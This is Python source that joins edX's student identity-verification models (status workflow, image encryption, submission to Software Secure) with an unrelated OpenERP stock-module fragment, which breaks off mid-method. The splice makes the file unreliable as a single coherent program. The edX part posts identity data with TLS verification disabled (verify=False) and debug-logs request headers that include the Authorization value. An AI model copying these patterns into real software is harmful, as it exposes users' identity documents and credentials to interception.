class VerificationException(Exception):
    pass


def status_before_must_be(*valid_start_statuses):
    """
    Helper decorator with arguments to make sure that an object with a `status`
    attribute is in one of a list of acceptable status states before a method
    is called. You could use it in a class definition like:

        @status_before_must_be("submitted", "approved", "denied")
        def refund_user(self, user_id):
            # Do logic here...

    If the object has a status that is not listed when the `refund_user` method
    is invoked, it will throw a `VerificationException`. This is just to avoid
    distracting boilerplate when looking at a Model that needs to go through a
    workflow process.
    """
    def decorator_func(func):
        """
        Decorator function that gets returned
        """
        @functools.wraps(func)
        def with_status_check(obj, *args, **kwargs):
            if obj.status not in valid_start_statuses:
                exception_msg = (
                    u"Error calling {} {}: status is '{}', must be one of: {}"
                ).format(func, obj, obj.status, valid_start_statuses)
                raise VerificationException(exception_msg)
            return func(obj, *args, **kwargs)

        return with_status_check

    return decorator_func


class IDVerificationAttempt(StatusModel):
    """
    Each IDVerificationAttempt represents a Student's attempt to establish
    their identity through one of several methods that inherit from this Model,
    including PhotoVerification and SSOVerification.

    .. pii: The User's name is stored in this and sub-models
    .. pii_types: name
    .. pii_retirement: retained
    """
    STATUS = Choices('created', 'ready', 'submitted', 'must_retry', 'approved', 'denied')
    user = models.ForeignKey(User, db_index=True, on_delete=models.CASCADE)

    # They can change their name later on, so we want to copy the value here so
    # we always preserve what it was at the time they requested. We only copy
    # this value during the mark_ready() step. Prior to that, you should be
    # displaying the user's name from their user.profile.name.
    name = models.CharField(blank=True, max_length=255)

    created_at = models.DateTimeField(auto_now_add=True, db_index=True)
    updated_at = models.DateTimeField(auto_now=True, db_index=True)

    class Meta(object):
        app_label = "verify_student"
        abstract = True
        ordering = ['-created_at']

    @property
    def expiration_datetime(self):
        """Datetime that the verification will expire. """
        days_good_for = settings.VERIFY_STUDENT["DAYS_GOOD_FOR"]
        return self.created_at + timedelta(days=days_good_for)

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        raise NotImplementedError

    def active_at_datetime(self, deadline):
        """Check whether the verification was active at a particular datetime.

        Arguments:
            deadline (datetime): The date at which the verification was active
                (created before and expiration datetime is after today).

        Returns:
            bool

        """
        return (
            self.created_at < deadline and
            self.expiration_datetime > now()
        )


class ManualVerification(IDVerificationAttempt):
    """
    Each ManualVerification represents a user's verification that bypasses the need for
    any other verification.

    .. pii: The User's name is stored in the parent model
    .. pii_types: name
    .. pii_retirement: retained
    """

    reason = models.CharField(
        max_length=255,
        blank=True,
        help_text=(
            'Specifies the reason for manual verification of the user.'
        )
    )

    class Meta(object):
        app_label = 'verify_student'

    def __unicode__(self):
        return 'ManualIDVerification for {name}, status: {status}'.format(
            name=self.name,
            status=self.status,
        )

    def should_display_status_to_user(self):
        """
        Whether or not the status should be displayed to the user.
        """
        return False


class SSOVerification(IDVerificationAttempt):
    """
    Each SSOVerification represents a Student's attempt to establish their identity
    by signing in with SSO. ID verification through SSO bypasses the need for
    photo verification.

    .. no_pii:
    """

    OAUTH2 = 'third_party_auth.models.OAuth2ProviderConfig'
    SAML = 'third_party_auth.models.SAMLProviderConfig'
    LTI = 'third_party_auth.models.LTIProviderConfig'
    IDENTITY_PROVIDER_TYPE_CHOICES = (
        (OAUTH2, 'OAuth2 Provider'),
        (SAML, 'SAML Provider'),
        (LTI, 'LTI Provider'),
    )

    identity_provider_type = models.CharField(
        max_length=100,
        blank=False,
        choices=IDENTITY_PROVIDER_TYPE_CHOICES,
        default=SAML,
        help_text=(
            'Specifies which type of Identity Provider this verification originated from.'
        )
    )

    identity_provider_slug = models.SlugField(
        max_length=30, db_index=True, default='default',
        help_text=(
            'The slug uniquely identifying the Identity Provider this verification originated from.'
        ))

    class Meta(object):
        app_label = "verify_student"

    def __unicode__(self):
        return 'SSOIDVerification for {name}, status: {status}'.format(
            name=self.name,
            status=self.status,
        )

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        return False


class PhotoVerification(IDVerificationAttempt):
    """
    Each PhotoVerification represents a Student's attempt to establish
    their identity by uploading a photo of themselves and a picture ID. An
    attempt actually has a number of fields that need to be filled out at
    different steps of the approval process. While it's useful as a Django Model
    for the querying facilities, **you should only edit a `PhotoVerification`
    object through the methods provided**. Initialize them with a user:

    attempt = PhotoVerification(user=user)

    We track this attempt through various states:

    `created`
        Initial creation and state we're in after uploading the images.
    `ready`
        The user has uploaded their images and checked that they can read the
        images. There's a separate state here because it may be the case that we
        don't actually submit this attempt for review until payment is made.
    `submitted`
        Submitted for review. The review may be done by a staff member or an
        external service. The user cannot make changes once in this state.
    `must_retry`
        We submitted this, but there was an error on submission (i.e. we did not
        get a 200 when we POSTed to Software Secure)
    `approved`
        An admin or an external service has confirmed that the user's photo and
        photo ID match up, and that the photo ID's name matches the user's.
    `denied`
        The request has been denied. See `error_msg` for details on why. An
        admin might later override this and change to `approved`, but the
        student cannot re-open this attempt -- they have to create another
        attempt and submit it instead.

    Because this Model inherits from IDVerificationAttempt, which inherits
    from StatusModel, we can also do things like:

        attempt.status == PhotoVerification.STATUS.created
        attempt.status == "created"
        pending_requests = PhotoVerification.submitted.all()

    .. pii: The User's name is stored in the parent model, this one stores links to face and photo ID images
    .. pii_types: name, image
    .. pii_retirement: retained
    """
    ######################## Fields Set During Creation ########################
    # See class docstring for description of status states
    # Where we place the uploaded image files (e.g. S3 URLs)
    face_image_url = models.URLField(blank=True, max_length=255)
    photo_id_image_url = models.URLField(blank=True, max_length=255)

    # Randomly generated UUID so that external services can post back the
    # results of checking a user's photo submission without use exposing actual
    # user IDs or something too easily guessable.
    receipt_id = models.CharField(
        db_index=True,
        default=generateUUID,
        max_length=255,
    )

    # Indicates whether or not a user wants to see the verification status
    # displayed on their dash.  Right now, only relevant for allowing students
    # to "dismiss" a failed midcourse reverification message
    # TODO: This field is deprecated.
    display = models.BooleanField(db_index=True, default=True)

    ######################## Fields Set When Submitting ########################
    submitted_at = models.DateTimeField(null=True, db_index=True)

    #################### Fields Set During Approval/Denial #####################
    # If the review was done by an internal staff member, mark who it was.
    reviewing_user = models.ForeignKey(
        User,
        db_index=True,
        default=None,
        null=True,
        related_name="photo_verifications_reviewed",
        on_delete=models.CASCADE,
    )

    # Mark the name of the service used to evaluate this attempt (e.g
    # Software Secure).
    reviewing_service = models.CharField(blank=True, max_length=255)

    # If status is "denied", this should contain text explaining why.
    error_msg = models.TextField(blank=True)

    # Non-required field. External services can add any arbitrary codes as time
    # goes on. We don't try to define an exhuastive list -- this is just
    # capturing it so that we can later query for the common problems.
    error_code = models.CharField(blank=True, max_length=50)

    class Meta(object):
        app_label = "verify_student"
        abstract = True
        ordering = ['-created_at']

    def parsed_error_msg(self):
        """
        Sometimes, the error message we've received needs to be parsed into
        something more human readable

        The default behavior is to return the current error message as is.
        """
        return self.error_msg

    @status_before_must_be("created")
    def upload_face_image(self, img):
        raise NotImplementedError

    @status_before_must_be("created")
    def upload_photo_id_image(self, img):
        raise NotImplementedError

    @status_before_must_be("created")
    def mark_ready(self):
        """
        Mark that the user data in this attempt is correct. In order to
        succeed, the user must have uploaded the necessary images
        (`face_image_url`, `photo_id_image_url`). This method will also copy
        their name from their user profile. Prior to marking it ready, we read
        this value directly from their profile, since they're free to change it.
        This often happens because people put in less formal versions of their
        name on signup, but realize they want something different to go on a
        formal document.

        Valid attempt statuses when calling this method:
            `created`

        Status after method completes: `ready`

        Other fields that will be set by this method:
            `name`

        State Transitions:

        `created` → `ready`
            This is what happens when the user confirms to us that the pictures
            they uploaded are good. Note that we don't actually do a submission
            anywhere yet.
        """
        # At any point prior to this, they can change their names via their
        # student dashboard. But at this point, we lock the value into the
        # attempt.
        self.name = self.user.profile.name
        self.status = "ready"
        self.save()

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def approve(self, user_id=None, service=""):
        """
        Approve this attempt. `user_id`

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        Status after method completes: `approved`

        Other fields that will be set by this method:
            `reviewed_by_user_id`, `reviewed_by_service`, `error_msg`

        State Transitions:

        `submitted` → `approved`
            This is the usual flow, whether initiated by a staff user or an
            external validation service.
        `approved` → `approved`
            No-op. First one to approve it wins.
        `denied` → `approved`
            This might happen if a staff member wants to override a decision
            made by an external service or another staff member (say, in
            response to a support request). In this case, the previous values
            of `reviewed_by_user_id` and `reviewed_by_service` will be changed
            to whoever is doing the approving, and `error_msg` will be reset.
            The only record that this record was ever denied would be in our
            logs. This should be a relatively rare occurence.
        """
        # If someone approves an outdated version of this, the first one wins
        if self.status == "approved":
            return

        log.info(u"Verification for user '{user_id}' approved by '{reviewer}'.".format(
            user_id=self.user, reviewer=user_id
        ))
        self.error_msg = ""  # reset, in case this attempt was denied before
        self.error_code = ""  # reset, in case this attempt was denied before
        self.reviewing_user = user_id
        self.reviewing_service = service
        self.status = "approved"
        self.save()
        # Emit signal to find and generate eligible certificates
        LEARNER_NOW_VERIFIED.send_robust(
            sender=PhotoVerification,
            user=self.user
        )

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def deny(self,
             error_msg,
             error_code="",
             reviewing_user=None,
             reviewing_service=""):
        """
        Deny this attempt.

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        Status after method completes: `denied`

        Other fields that will be set by this method:
            `reviewed_by_user_id`, `reviewed_by_service`, `error_msg`,
            `error_code`

        State Transitions:

        `submitted` → `denied`
            This is the usual flow, whether initiated by a staff user or an
            external validation service.
        `approved` → `denied`
            This might happen if a staff member wants to override a decision
            made by an external service or another staff member, or just correct
            a mistake made during the approval process. In this case, the
            previous values of `reviewed_by_user_id` and `reviewed_by_service`
            will be changed to whoever is doing the denying. The only record
            that this record was ever approved would be in our logs. This should
            be a relatively rare occurence.
        `denied` → `denied`
            Update the error message and reviewing_user/reviewing_service. Just
            lets you amend the error message in case there were additional
            details to be made.
        """
        log.info(u"Verification for user '{user_id}' denied by '{reviewer}'.".format(
            user_id=self.user, reviewer=reviewing_user
        ))
        self.error_msg = error_msg
        self.error_code = error_code
        self.reviewing_user = reviewing_user
        self.reviewing_service = reviewing_service
        self.status = "denied"
        self.save()

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def system_error(self,
                     error_msg,
                     error_code="",
                     reviewing_user=None,
                     reviewing_service=""):
        """
        Mark that this attempt could not be completed because of a system error.
        Status should be moved to `must_retry`. For example, if Software Secure
        reported to us that they couldn't process our submission because they
        couldn't decrypt the image we sent.
        """
        if self.status in ["approved", "denied"]:
            return  # If we were already approved or denied, just leave it.

        self.error_msg = error_msg
        self.error_code = error_code
        self.reviewing_user = reviewing_user
        self.reviewing_service = reviewing_service
        self.status = "must_retry"
        self.save()

    @classmethod
    def retire_user(cls, user_id):
        """
        Retire user as part of GDPR Phase I
        Returns 'True' if records found

        :param user_id: int
        :return: bool
        """
        try:
            user_obj = User.objects.get(id=user_id)
        except User.DoesNotExist:
            return False

        photo_objects = cls.objects.filter(
            user=user_obj
        ).update(
            name='',
            face_image_url='',
            photo_id_image_url='',
            photo_id_key=''
        )
        return photo_objects > 0


class SoftwareSecurePhotoVerification(PhotoVerification):
    """
    Model to verify identity using a service provided by Software Secure. Much
    of the logic is inherited from `PhotoVerification`, but this class
    encrypts the photos.

    Software Secure (http://www.softwaresecure.com/) is a remote proctoring
    service that also does identity verification. A student uses their webcam
    to upload two images: one of their face, one of a photo ID. Due to the
    sensitive nature of the data, the following security precautions are taken:

    1. The snapshot of their face is encrypted using AES-256 in CBC mode. All
       face photos are encypted with the same key, and this key is known to
       both Software Secure and edx-platform.

    2. The snapshot of a user's photo ID is also encrypted using AES-256, but
       the key is randomly generated using os.urandom. Every verification
       attempt has a new key. The AES key is then encrypted using a public key
       provided by Software Secure. We store only the RSA-encryped AES key.
       Since edx-platform does not have Software Secure's private RSA key, it
       means that we can no longer even read photo ID.

    3. The encrypted photos are base64 encoded and stored in an S3 bucket that
       edx-platform does not have read access to.

    Note: this model handles *inital* verifications (which you must perform
    at the time you register for a verified cert).

    .. pii: The User's name is stored in the parent model, this one stores links to face and photo ID images
    .. pii_types: name, image
    .. pii_retirement: retained
    """
    # This is a base64.urlsafe_encode(rsa_encrypt(photo_id_aes_key), ss_pub_key)
    # So first we generate a random AES-256 key to encrypt our photo ID with.
    # Then we RSA encrypt it with Software Secure's public key. Then we base64
    # encode that. The result is saved here. Actual expected length is 344.
    photo_id_key = models.TextField(max_length=1024)

    IMAGE_LINK_DURATION = 5 * 60 * 60 * 24  # 5 days in seconds
    copy_id_photo_from = models.ForeignKey("self", null=True, blank=True, on_delete=models.CASCADE)

    # Fields for functionality of sending email when verification expires
    # expiry_date: The date when the SoftwareSecurePhotoVerification will expire
    # expiry_email_date: This field is used to maintain a check for learners to which email
    # to notify for expired verification is already sent.
    expiry_date = models.DateTimeField(null=True, blank=True, db_index=True)
    expiry_email_date = models.DateTimeField(null=True, blank=True, db_index=True)

    @status_before_must_be("must_retry", "submitted", "approved", "denied")
    def approve(self, user_id=None, service=""):
        """
        Approve the verification attempt for user

        Valid attempt statuses when calling this method:
            `submitted`, `approved`, `denied`

        After method completes:
            status is set to `approved`
            expiry_date is set to one year from now
        """
        self.expiry_date = now() + timedelta(
            days=settings.VERIFY_STUDENT["DAYS_GOOD_FOR"]
        )
        super(SoftwareSecurePhotoVerification, self).approve(user_id, service)

    @classmethod
    def get_initial_verification(cls, user, earliest_allowed_date=None):
        """Get initial verification for a user with the 'photo_id_key'.

        Arguments:
            user(User): user object
            earliest_allowed_date(datetime): override expiration date for initial verification

        Return:
            SoftwareSecurePhotoVerification (object) or None
        """
        init_verification = cls.objects.filter(
            user=user,
            status__in=["submitted", "approved"],
            created_at__gte=(
                earliest_allowed_date or earliest_allowed_verification_date()
            )
        ).exclude(photo_id_key='')

        return init_verification.latest('created_at') if init_verification.exists() else None

    @status_before_must_be("created")
    def upload_face_image(self, img_data):
        """
        Upload an image of the user's face. `img_data` should be a raw
        bytestream of a PNG image. This method will take the data, encrypt it
        using our FACE_IMAGE_AES_KEY, encode it with base64 and save it to the
        storage backend.

        Yes, encoding it to base64 adds compute and disk usage without much real
        benefit, but that's what the other end of this API is expecting to get.
        """
        # Skip this whole thing if we're running acceptance tests or if we're
        # developing and aren't interested in working on student identity
        # verification functionality. If you do want to work on it, you have to
        # explicitly enable these in your private settings.
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            return

        aes_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["FACE_IMAGE_AES_KEY"]
        aes_key = aes_key_str.decode("hex")

        path = self._get_path("face")
        buff = ContentFile(encrypt_and_encode(img_data, aes_key))
        self._storage.save(path, buff)

    @status_before_must_be("created")
    def upload_photo_id_image(self, img_data):
        """
        Upload an the user's photo ID image. `img_data` should be a raw
        bytestream of a PNG image. This method will take the data, encrypt it
        using a randomly generated AES key, encode it with base64 and save it
        to the storage backend. The random key is also encrypted using Software
        Secure's public RSA key and stored in our `photo_id_key` field.

        Yes, encoding it to base64 adds compute and disk usage without much real
        benefit, but that's what the other end of this API is expecting to get.
        """
        # Skip this whole thing if we're running acceptance tests or if we're
        # developing and aren't interested in working on student identity
        # verification functionality. If you do want to work on it, you have to
        # explicitly enable these in your private settings.
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            # fake photo id key is set only for initial verification
            self.photo_id_key = 'fake-photo-id-key'
            self.save()
            return

        aes_key = random_aes_key()
        rsa_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["RSA_PUBLIC_KEY"]
        rsa_encrypted_aes_key = rsa_encrypt(aes_key, rsa_key_str)

        # Save this to the storage backend
        path = self._get_path("photo_id")
        buff = ContentFile(encrypt_and_encode(img_data, aes_key))
        self._storage.save(path, buff)

        # Update our record fields
        self.photo_id_key = rsa_encrypted_aes_key.encode('base64')
        self.save()

    @status_before_must_be("must_retry", "ready", "submitted")
    def submit(self, copy_id_photo_from=None):
        """
        Submit our verification attempt to Software Secure for validation. This
        will set our status to "submitted" if the post is successful, and
        "must_retry" if the post fails.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        """
        try:
            response = self.send_request(copy_id_photo_from=copy_id_photo_from)
            if response.ok:
                self.submitted_at = now()
                self.status = "submitted"
                self.save()
            else:
                self.status = "must_retry"
                self.error_msg = response.text
                self.save()
        except Exception:       # pylint: disable=broad-except
            log.exception(
                u'Software Secure submission failed for user %s, setting status to must_retry',
                self.user.username
            )
            self.status = "must_retry"
            self.save()

    def parsed_error_msg(self):
        """
        Parse the error messages we receive from SoftwareSecure

        Error messages are written in the form:

            `[{"photoIdReasons": ["Not provided"]}]`

        Returns:
            str[]: List of error messages.
        """
        parsed_errors = []
        error_map = {
            'EdX name not provided': 'name_mismatch',
            'Name mismatch': 'name_mismatch',
            'Photo/ID Photo mismatch': 'photos_mismatched',
            'ID name not provided': 'id_image_missing_name',
            'Invalid Id': 'id_invalid',
            'No text': 'id_invalid',
            'Not provided': 'id_image_missing',
            'Photo hidden/No photo': 'id_image_not_clear',
            'Text not clear': 'id_image_not_clear',
            'Face out of view': 'user_image_not_clear',
            'Image not clear': 'user_image_not_clear',
            'Photo not provided': 'user_image_missing',
        }

        try:
            messages = set()
            message_groups = json.loads(self.error_msg)

            for message_group in message_groups:
                messages = messages.union(set(*six.itervalues(message_group)))

            for message in messages:
                parsed_error = error_map.get(message)

                if parsed_error:
                    parsed_errors.append(parsed_error)
                else:
                    log.debug(u'Ignoring photo verification error message: %s', message)
        except Exception:   # pylint: disable=broad-except
            log.exception(u'Failed to parse error message for SoftwareSecurePhotoVerification %d', self.pk)

        return parsed_errors

    def image_url(self, name, override_receipt_id=None):
        """
        We dynamically generate this, since we want it the expiration clock to
        start when the message is created, not when the record is created.

        Arguments:
            name (str): Name of the image (e.g. "photo_id" or "face")

        Keyword Arguments:
            override_receipt_id (str): If provided, use this receipt ID instead
                of the ID for this attempt.  This is useful for reverification
                where we need to construct a URL to a previously-submitted
                photo ID image.

        Returns:
            string: The expiring URL for the image.

        """
        path = self._get_path(name, override_receipt_id=override_receipt_id)
        return self._storage.url(path)

    @cached_property
    def _storage(self):
        """
        Return the configured django storage backend.
        """
        config = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]

        # Default to the S3 backend for backward compatibility
        storage_class = config.get("STORAGE_CLASS", "storages.backends.s3boto.S3BotoStorage")
        storage_kwargs = config.get("STORAGE_KWARGS", {})

        # Map old settings to the parameters expected by the storage backend
        if "AWS_ACCESS_KEY" in config:
            storage_kwargs["access_key"] = config["AWS_ACCESS_KEY"]
        if "AWS_SECRET_KEY" in config:
            storage_kwargs["secret_key"] = config["AWS_SECRET_KEY"]
        if "S3_BUCKET" in config:
            storage_kwargs["bucket"] = config["S3_BUCKET"]
            storage_kwargs["querystring_expire"] = self.IMAGE_LINK_DURATION

        return get_storage(storage_class, **storage_kwargs)

    def _get_path(self, prefix, override_receipt_id=None):
        """
        Returns the path to a resource with this instance's `receipt_id`.

        If `override_receipt_id` is given, the path to that resource will be
        retrieved instead. This allows us to retrieve images submitted in
        previous attempts (used for reverification, where we send a new face
        photo with the same photo ID from a previous attempt).
        """
        receipt_id = self.receipt_id if override_receipt_id is None else override_receipt_id
        return os.path.join(prefix, receipt_id)

    def _encrypted_user_photo_key_str(self):
        """
        Software Secure needs to have both UserPhoto and PhotoID decrypted in
        the same manner. So even though this is going to be the same for every
        request, we're also using RSA encryption to encrypt the AES key for
        faces.
        """
        face_aes_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["FACE_IMAGE_AES_KEY"]
        face_aes_key = face_aes_key_str.decode("hex")
        rsa_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["RSA_PUBLIC_KEY"]
        rsa_encrypted_face_aes_key = rsa_encrypt(face_aes_key, rsa_key_str)

        return rsa_encrypted_face_aes_key.encode("base64")

    def create_request(self, copy_id_photo_from=None):
        """
        Construct the HTTP request to the photo verification service.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        Returns:
            tuple of (header, body), where both `header` and `body` are dictionaries.

        """
        access_key = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_ACCESS_KEY"]
        secret_key = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_SECRET_KEY"]

        scheme = "https" if settings.HTTPS == "on" else "http"
        callback_url = "{}://{}{}".format(
            scheme, settings.SITE_NAME, reverse('verify_student_results_callback')
        )

        # If we're copying the photo ID image from a previous verification attempt,
        # then we need to send the old image data with the correct image key.
        photo_id_url = (
            self.image_url("photo_id")
            if copy_id_photo_from is None
            else self.image_url("photo_id", override_receipt_id=copy_id_photo_from.receipt_id)
        )

        photo_id_key = (
            self.photo_id_key
            if copy_id_photo_from is None else
            copy_id_photo_from.photo_id_key
        )

        body = {
            "EdX-ID": str(self.receipt_id),
            "ExpectedName": self.name,
            "PhotoID": photo_id_url,
            "PhotoIDKey": photo_id_key,
            "SendResponseTo": callback_url,
            "UserPhoto": self.image_url("face"),
            "UserPhotoKey": self._encrypted_user_photo_key_str(),
        }
        headers = {
            "Content-Type": "application/json",
            "Date": formatdate(timeval=None, localtime=False, usegmt=True)
        }
        _message, _sig, authorization = generate_signed_message(
            "POST", headers, body, access_key, secret_key
        )
        headers['Authorization'] = authorization

        return headers, body

    def request_message_txt(self):
        """
        This is the body of the request we send across. This is never actually
        used in the code, but exists for debugging purposes -- you can call
        `print attempt.request_message_txt()` on the console and get a readable
        rendering of the request that would be sent across, without actually
        sending anything.
        """
        headers, body = self.create_request()

        header_txt = "\n".join(
            u"{}: {}".format(h, v) for h, v in sorted(headers.items())
        )
        body_txt = json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False).encode('utf-8')

        return header_txt + "\n\n" + body_txt

    def send_request(self, copy_id_photo_from=None):
        """
        Assembles a submission to Software Secure and sends it via HTTPS.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        Returns:
            request.Response

        """
        # If AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING is True, we want to
        # skip posting anything to Software Secure. We actually don't even
        # create the message because that would require encryption and message
        # signing that rely on settings.VERIFY_STUDENT values that aren't set
        # in dev. So we just pretend like we successfully posted
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            fake_response = requests.Response()
            fake_response.status_code = 200
            return fake_response

        headers, body = self.create_request(copy_id_photo_from=copy_id_photo_from)
        response = requests.post(
            settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_URL"],
            headers=headers,
            data=json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False).encode('utf-8'),
            verify=False
        )

        log.info(u"Sent request to Software Secure for receipt ID %s.", self.receipt_id)
        if copy_id_photo_from is not None:
            log.info(
                (
                    u"Software Secure attempt with receipt ID %s used the same photo ID "
                    u"data as the receipt with ID %s"
                ),
                self.receipt_id, copy_id_photo_from.receipt_id
            )

        log.debug("Headers:\n{}\n\n".format(headers))
        log.debug("Body:\n{}\n\n".format(body))
        log.debug(u"Return code: {}".format(response.status_code))
        log.debug(u"Return message:\n\n{}\n\n".format(response.text))

        return response

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        return True


class VerificationDeadline(TimeStampedModel):
    """
    Represent a verification deadline for a particular course.

    The verification deadline is the datetime after which
    users are no longer allowed to submit photos for initial verification
    in a course.

    Note that this is NOT the same as the "upgrade" deadline, after
    which a user is no longer allowed to upgrade to a verified enrollment.

    If no verification deadline record exists for a course,
    then that course does not have a deadline.  This means that users
    can submit photos at any time.

    .. no_pii:
    """
    class Meta(object):
        app_label = "verify_student"

    course_key = CourseKeyField(
        max_length=255,
        db_index=True,
        unique=True,
        help_text=ugettext_lazy(u"The course for which this deadline applies"),
    )

    deadline = models.DateTimeField(
        help_text=ugettext_lazy(
            u"The datetime after which users are no longer allowed "
            "to submit photos for verification."
        )
    )

    # The system prefers to set this automatically based on default settings. But
    # if the field is set manually we want a way to indicate that so we don't
    # overwrite the manual setting of the field.
    deadline_is_explicit = models.BooleanField(default=False)

    ALL_DEADLINES_CACHE_KEY = "verify_student.all_verification_deadlines"

    @classmethod
    def set_deadline(cls, course_key, deadline, is_explicit=False):
        """
        Configure the verification deadline for a course.

        If `deadline` is `None`, then the course will have no verification
        deadline.  In this case, users will be able to verify for the course
        at any time.

        Arguments:
            course_key (CourseKey): Identifier for the course.
            deadline (datetime or None): The verification deadline.

        """
        if deadline is None:
            VerificationDeadline.objects.filter(course_key=course_key).delete()
        else:
            record, created = VerificationDeadline.objects.get_or_create(
                course_key=course_key,
                defaults={"deadline": deadline, "deadline_is_explicit": is_explicit}
            )

            if not created:
                record.deadline = deadline
                record.deadline_is_explicit = is_explicit
                record.save()

    @classmethod
    def deadlines_for_courses(cls, course_keys):
        """
        Retrieve verification deadlines for particular courses.

        Arguments:
            course_keys (list): List of `CourseKey`s.

        Returns:
            dict: Map of course keys to datetimes (verification deadlines)

        """
        all_deadlines = cache.get(cls.ALL_DEADLINES_CACHE_KEY)
        if all_deadlines is None:
            all_deadlines = {
                deadline.course_key: deadline.deadline
                for deadline in VerificationDeadline.objects.all()
            }
            cache.set(cls.ALL_DEADLINES_CACHE_KEY, all_deadlines)

        return {
            course_key: all_deadlines[course_key]
            for course_key in course_keys
            if course_key in all_deadlines
        }

    @classmethod
    def deadline_for_course(cls, course_key):
        """
        Retrieve the verification deadline for a particular course.

        Arguments:
            course_key (CourseKey): The identifier for the course.

        Returns:
            datetime or None

        """
        try:
            deadline = cls.objects.get(course_key=course_key)
            return deadline.deadline
        except cls.DoesNotExist:
            return None


@receiver(models.signals.post_save, sender=VerificationDeadline)
@receiver(models.signals.post_delete, sender=VerificationDeadline)
def invalidate_deadline_caches(sender, **kwargs):  # pylint: disable=unused-argument
    """Invalidate the cached verification deadline information. """
    cache.delete(VerificationDeadline.ALL_DEADLINES_CACHE_KEY)

# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from datetime import datetime
from dateutil.relativedelta import relativedelta
import time
from operator import itemgetter
from itertools import groupby

from openerp.osv import fields, osv, orm
from openerp.tools.translate import _
from openerp import netsvc
from openerp import tools
from openerp.tools import float_compare, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
import logging
_logger = logging.getLogger(__name__)

#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
    _name = "stock.incoterms"
    _description = "Incoterms"
    _columns = {
        'name': fields.char('Name', size=64, required=True, help="Incoterms are series of sales terms.They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
        'code': fields.char('Code', size=3, required=True, help="Code for Incoterms"),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM without deleting it."),
    }
    _defaults = {
        'active': True,
    }

stock_incoterms()

class stock_journal(osv.osv):
    _name = "stock.journal"
    _description = "Stock Journal"
    _columns = {
        'name': fields.char('Stock Journal', size=32, required=True),
        'user_id': fields.many2one('res.users', 'Responsible'),
    }
    _defaults = {
        'user_id': lambda s, c, u, ctx: u
    }

stock_journal()

#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
    _name = "stock.location"
    _description = "Location"
    _parent_name = "location_id"
    _parent_store = True
    _parent_order = 'posz,name'
    _order = 'parent_left'

    # TODO: implement name_search() in a way that matches the results of name_get!

    def name_get(self, cr, uid, ids, context=None):
        # always return the full hierarchical name
        res = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
        return res.items()

    def _complete_name(self, cr, uid, ids, name, args, context=None):
        """ Forms complete name of location from parent location to child location.
        @return: Dictionary of values
        """
        res = {}
        for m in self.browse(cr, uid, ids, context=context):
            names = [m.name]
            parent = m.location_id
            while parent:
                names.append(parent.name)
                parent = parent.location_id
            res[m.id] = ' / '.join(reversed(names))
        return res

    def _get_sublocations(self, cr, uid, ids, context=None):
        """ return all sublocations of the given stock locations (included) """
        return self.search(cr, uid, [('id', 'child_of', ids)], context=context)

    def _product_value(self, cr, uid, ids, field_names, arg, context=None):
        """Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).
        @param field_names: Name of field
        @return: Dictionary of values
        """
        prod_id = context and context.get('product_id', False)

        if not prod_id:
            return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])

        product_product_obj = self.pool.get('product.product')

        cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))
        dict1 = cr.dictfetchall()
        cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))
        dict2 = cr.dictfetchall()
        res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))
